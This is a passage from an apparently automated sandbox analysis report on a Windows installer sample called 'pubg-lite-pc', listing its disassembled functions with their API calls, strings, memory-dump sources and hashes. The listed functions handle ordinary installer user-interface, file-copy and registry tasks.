                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 009827B1
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 009827BD
                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 009827C6
                                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 009827E4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Long$CreateMessageSend
                                                                                                • String ID: ProgressBar$msctls_progress32
                                                                                                • API String ID: 301620804-79040089
                                                                                                • Opcode ID: e1d3feb5d15971ea7642c103ee0b1546924ae7e9a0152ab4760b6ece8ef848c7
                                                                                                • Instruction ID: 07bea39519653cf4a45723242611be198f6152f8333d343e72534b7a02337cfb
                                                                                                • Opcode Fuzzy Hash: e1d3feb5d15971ea7642c103ee0b1546924ae7e9a0152ab4760b6ece8ef848c7
                                                                                                • Instruction Fuzzy Hash: 2E516B71A00218AFCB04DF68CD88FAEB7B5FF49710F144259E912AB3A4DB74AD05CB64
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009B2640 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 82libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,LockServiceDatabase), ref: 009B269C
                                                                                                • GetProcAddress.KERNEL32(?,UnlockServiceDatabase), ref: 009B26BD
                                                                                                • GetLastError.KERNEL32 ref: 009B26D0
                                                                                                • GetLastError.KERNEL32 ref: 009B26DD
                                                                                                • GetLastError.KERNEL32 ref: 009B26EC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$AddressProc
                                                                                                • String ID: LockServiceDatabase$UnlockServiceDatabase
                                                                                                • API String ID: 1975335638-211437345
                                                                                                • Opcode ID: 171900d9c0bb9a6f97962515d7dead9f117fcc66146ebbadbea8099533621ba0
                                                                                                • Instruction ID: 59548b851d6f5131e2a527b7834a6375ce0d775ff1c08ebfe7afb9cda488b04c
                                                                                                • Opcode Fuzzy Hash: 171900d9c0bb9a6f97962515d7dead9f117fcc66146ebbadbea8099533621ba0
                                                                                                • Instruction Fuzzy Hash: 2D21A071A44308DFDB10DFA5CD89BAAB7F8FB54B60F10452EE815D3690DFB4A9048A64
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0096C9F0 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 245COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @,w$Pause$Play$Rewind$Stop
                                                                                                • API String ID: 0-2346359474
                                                                                                • Opcode ID: 82427b4dd65a8acb4770c71a298391a7a76d4ed91e8db27475e113b296c49ac8
                                                                                                • Instruction ID: e5e734989928646ce8df7c9742d04731404d05d44ff5b7fb035d3a0ffe1990f4
                                                                                                • Opcode Fuzzy Hash: 82427b4dd65a8acb4770c71a298391a7a76d4ed91e8db27475e113b296c49ac8
                                                                                                • Instruction Fuzzy Hash: 96A1AF70F012059FDB04DF54D885BAEBBB6FF95314F244168E816AB3A1DB30AD41CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00937FE0 Relevance: 12.1, APIs: 8, Instructions: 138COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowRect.USER32(?,?), ref: 0093800A
                                                                                                • GetWindow.USER32(?,00000005), ref: 00938017
                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00938152
                                                                                                  • Part of subcall function 00937E60: GetWindowRect.USER32(?,?), ref: 00937E8C
                                                                                                  • Part of subcall function 00937E60: GetWindowRect.USER32(?,?), ref: 00937E9C
                                                                                                • GetWindowRect.USER32(?,?), ref: 009380AB
                                                                                                • GetWindowRect.USER32(00000000,?), ref: 009380BB
                                                                                                • GetWindowRect.USER32(00000000,?), ref: 009380D5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Rect
                                                                                                • String ID:
                                                                                                • API String ID: 3200805268-0
                                                                                                • Opcode ID: fee48ff4ad93f8a6643d39852fe7338bc2f6716edec51f7d6ea78fa10e40c5bc
                                                                                                • Instruction ID: 26e73033e5650926af8f0d6ed0c0bced1949d58859d391b281d7724804929efc
                                                                                                • Opcode Fuzzy Hash: fee48ff4ad93f8a6643d39852fe7338bc2f6716edec51f7d6ea78fa10e40c5bc
                                                                                                • Instruction Fuzzy Hash: 9E416B315087019BC721DF69C980AABF7FABF96704F504A1DF08697621EB30E989CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A431F9 Relevance: 12.1, APIs: 8, Instructions: 73memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00A433A3,00000000,?,?,0092F3F4,?), ref: 00A4321D
                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,0092F3F4,?), ref: 00A43224
                                                                                                  • Part of subcall function 00A432EF: IsProcessorFeaturePresent.KERNEL32(0000000C,00A4320B,00000000,?,00A433A3,00000000,?,?,0092F3F4,?), ref: 00A432F1
                                                                                                • InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,00A433A3,00000000,?,?,0092F3F4,?), ref: 00A43234
                                                                                                • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,0092F3F4,?), ref: 00A4325B
                                                                                                • RaiseException.KERNEL32(C0000017,00000000,00000000,00000000,?,?,0092F3F4,?), ref: 00A4326F
                                                                                                • InterlockedPopEntrySList.KERNEL32(00000000,?,?,0092F3F4,?), ref: 00A43282
                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0092F3F4,?), ref: 00A43295
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
                                                                                                • String ID:
                                                                                                • API String ID: 2460949444-0
                                                                                                • Opcode ID: 65e88dbb1bb6ce6d1779374728d10096432254d58930049a6db050820f86c9ef
                                                                                                • Instruction ID: 44b74cc2479d22028e5f8298851fc26ec6d6b6da6835953056d6645c07dff87a
                                                                                                • Opcode Fuzzy Hash: 65e88dbb1bb6ce6d1779374728d10096432254d58930049a6db050820f86c9ef
                                                                                                • Instruction Fuzzy Hash: 3711B67A740611BBEE21DBA8AC88FAB766CBFA4745F110021FA01E6251DEA0DE0546B0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00943600 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 445windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 009436D0
                                                                                                  • Part of subcall function 00A45A61: EnterCriticalSection.KERNEL32(00B0282C,?,?,?,00929396,00B0345C,F4D3B90A,?,?,00A65C3D,000000FF,?,009EA9BC,F4D3B90A), ref: 00A45A6C
                                                                                                  • Part of subcall function 00A45A61: LeaveCriticalSection.KERNEL32(00B0282C,?,00929396,00B0345C,F4D3B90A,?,?,00A65C3D,000000FF,?,009EA9BC,F4D3B90A), ref: 00A45AA9
                                                                                                  • Part of subcall function 00A45A17: EnterCriticalSection.KERNEL32(00B0282C,?,?,00929407,00B0345C,00A9C710), ref: 00A45A21
                                                                                                  • Part of subcall function 00A45A17: LeaveCriticalSection.KERNEL32(00B0282C,?,00929407,00B0345C,00A9C710), ref: 00A45A54
                                                                                                  • Part of subcall function 00A45A17: RtlWakeAllConditionVariable.NTDLL ref: 00A45ACB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave$ConditionMessageSendVariableWake
                                                                                                • String ID: AiFeatIco
                                                                                                • API String ID: 2075478304-859831556
                                                                                                • Opcode ID: dec0bce4d76242035e339472ccbd7c26079c50af1e369e1dacf5a9d664ed6db2
                                                                                                • Instruction ID: 320615320deae6c8f6d48492d2fb62db7819579c55d41465ff2b9eee6d1c8a2a
                                                                                                • Opcode Fuzzy Hash: dec0bce4d76242035e339472ccbd7c26079c50af1e369e1dacf5a9d664ed6db2
                                                                                                • Instruction Fuzzy Hash: 1312AF71900249DFDF14DFA8C985BEDBBB5FF58304F184169E805AF296DB70AA04CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009BF950 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 408fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 009292F0: GetProcessHeap.KERNEL32 ref: 00929345
                                                                                                • CopyFileW.KERNEL32(?,?,00000000,00000000,00000000), ref: 009BFB28
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CopyFileHeapProcess
                                                                                                • String ID: AI_PRODUCTNAME_ARP$ProductName$\\?\$instname-custom.mst$instname-target.msi
                                                                                                • API String ID: 3317225124-2776905159
                                                                                                • Opcode ID: 006366f2d91593143e31e2a206cbe838456334150c03508d1a52d15472a299ba
                                                                                                • Instruction ID: de5aa7fbf065fd325870c3d4f65d2feffd851563187ba9cc32321a07ab670d68
                                                                                                • Opcode Fuzzy Hash: 006366f2d91593143e31e2a206cbe838456334150c03508d1a52d15472a299ba
                                                                                                • Instruction Fuzzy Hash: 2CE18F31A01649DFDB00DFACCD58B9EBBB8AF95324F148269E415DB292EB34DD05CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009DE310 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 333COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: FlashWindow$FlashWindowEx$user32.dll
                                                                                                • API String ID: 0-1890803043
                                                                                                • Opcode ID: 842e1ac346f2f5b193306cfdfe3085789ffc9809d939be6ecb4d8284b4030ebb
                                                                                                • Instruction ID: d73556b32e8aaf708ac8828f10854d804e8d057e7330d37b94bc957721cb76b2
                                                                                                • Opcode Fuzzy Hash: 842e1ac346f2f5b193306cfdfe3085789ffc9809d939be6ecb4d8284b4030ebb
                                                                                                • Instruction Fuzzy Hash: A8C1F071A002059FDB10EF58D884BAAFBE9FF94754F14866EE804DB351EB71E941CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009336D0 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 269COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(00B035C4,F4D3B90A,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00A68045), ref: 0093373A
                                                                                                • GetModuleFileNameW.KERNEL32(0000FFFF,00000104,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00A68045), ref: 009337BA
                                                                                                • EnterCriticalSection.KERNEL32(00B035E0,?,?,?,?,?,?,?,?,?,?,?,00000000,00A68045,000000FF), ref: 00933973
                                                                                                • LeaveCriticalSection.KERNEL32(00B035E0,?,?,?,?,?,?,?,?,?,?,00000000,00A68045,000000FF), ref: 00933994
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Enter$FileLeaveModuleName
                                                                                                • String ID: @,w
                                                                                                • API String ID: 1807155316-1809401727
                                                                                                • Opcode ID: 084a1588a51e18bddfce712b6d0656ca79ec4992767bee31b7bdfc20046aa79f
                                                                                                • Instruction ID: cd84d166193e538840d7fbf3f95cbb177dd11ad8b10c61c58c8dc8ef3acd4033
                                                                                                • Opcode Fuzzy Hash: 084a1588a51e18bddfce712b6d0656ca79ec4992767bee31b7bdfc20046aa79f
                                                                                                • Instruction Fuzzy Hash: CDB17074A40249DFDB11CFA4C888BAEBBB8BF08314F148559E445EB391CBB5AE45CF60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00980820 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 263windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00980881
                                                                                                • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00980B18
                                                                                                • SendMessageW.USER32(?,0000101E,00000000,0000FFFE), ref: 00980B5B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID: AiIndirectListProperty$ListBox$`Property` = '
                                                                                                • API String ID: 3850602802-3253846292
                                                                                                • Opcode ID: e0e0222b54d142399a5c9139c4f8ffb8ac232d576d2381f6d4f113d9d4e6b448
                                                                                                • Instruction ID: a0d8a316eb99e80c22b63402c7536e45dc1efea93b09d1158f06ba20683d0e04
                                                                                                • Opcode Fuzzy Hash: e0e0222b54d142399a5c9139c4f8ffb8ac232d576d2381f6d4f113d9d4e6b448
                                                                                                • Instruction Fuzzy Hash: EDC17C71A00288EFDF04DFA4C984BDE7BB5BF59304F148169F805AB396D775AA48CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00935990 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 229registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000000,Caphyon.AI.ExtUI.IEClickSoundRemover,F4D3B90A), ref: 00935A1D
                                                                                                • GetLastError.KERNEL32 ref: 00935A46
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,00AA9988,00000000,?,80000001,00000000,00000000,AppEvents\Schemes\Apps\Explorer\Navigating\.Current,00000033), ref: 00935B8D
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,00AA9988,00000000,00AA9988,00000000,?,80000001,00000001,00000000,AppEvents\Schemes\Apps\Explorer\Navigating\.Current,00000033), ref: 00935CC5
                                                                                                Strings
                                                                                                • AppEvents\Schemes\Apps\Explorer\Navigating\.Current, xrefs: 00935A85, 00935BC3
                                                                                                • Caphyon.AI.ExtUI.IEClickSoundRemover, xrefs: 00935A12
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Close$CreateErrorEventLast
                                                                                                • String ID: AppEvents\Schemes\Apps\Explorer\Navigating\.Current$Caphyon.AI.ExtUI.IEClickSoundRemover
                                                                                                • API String ID: 2907419958-2079760225
                                                                                                • Opcode ID: 509470aa8454e1641df74ef86222aa8431edf51094d8bfb9e93cfb5696cae5ec
                                                                                                • Instruction ID: 00516ac1eb1d4123c7543e63c2b72be44201c7f4509dde38457abe94b7cfb19e
                                                                                                • Opcode Fuzzy Hash: 509470aa8454e1641df74ef86222aa8431edf51094d8bfb9e93cfb5696cae5ec
                                                                                                • Instruction Fuzzy Hash: A6A16C70C15288EEDB10DFA8C985BDEFBF4AF15308F108199E445B7281DBB46A48CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00979560 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 214windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00928FC0: RtlAllocateHeap.NTDLL(?,00000000,?,F4D3B90A,00000000,00A65840,000000FF,?,?,00AF91CC,?,009EAA18,80004005,F4D3B90A), ref: 0092900A
                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 009796EA
                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00979721
                                                                                                • SendMessageW.USER32(?,000000C5,?,00000000), ref: 00979788
                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 009797C1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow$AllocateHeapLong
                                                                                                • String ID: 4$ComboBox
                                                                                                • API String ID: 3311722066-2082171053
                                                                                                • Opcode ID: a0677543c41db84971d05dae931c4cf0680289da1e82f6f4684267cfa67489f7
                                                                                                • Instruction ID: 1cfcdbc80990ad3951e4db8053a4405de460d73c04d56f6e12dc72dadfa3d7b6
                                                                                                • Opcode Fuzzy Hash: a0677543c41db84971d05dae931c4cf0680289da1e82f6f4684267cfa67489f7
                                                                                                • Instruction Fuzzy Hash: 35818C71A006059FDB14DF68CC89FAAB7F5FF98310F10861DF516AB2A0DB70A944CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00930D80 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 155COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(00B0380C,F4D3B90A,009D1D37,?), ref: 00930DF3
                                                                                                • LeaveCriticalSection.KERNEL32(00B0380C), ref: 00930E57
                                                                                                • LoadCursorW.USER32(00920000,?), ref: 00930EB0
                                                                                                • LeaveCriticalSection.KERNEL32(00B0380C), ref: 00930F48
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Leave$CursorEnterLoad
                                                                                                • String ID: @,w$ATL:%p
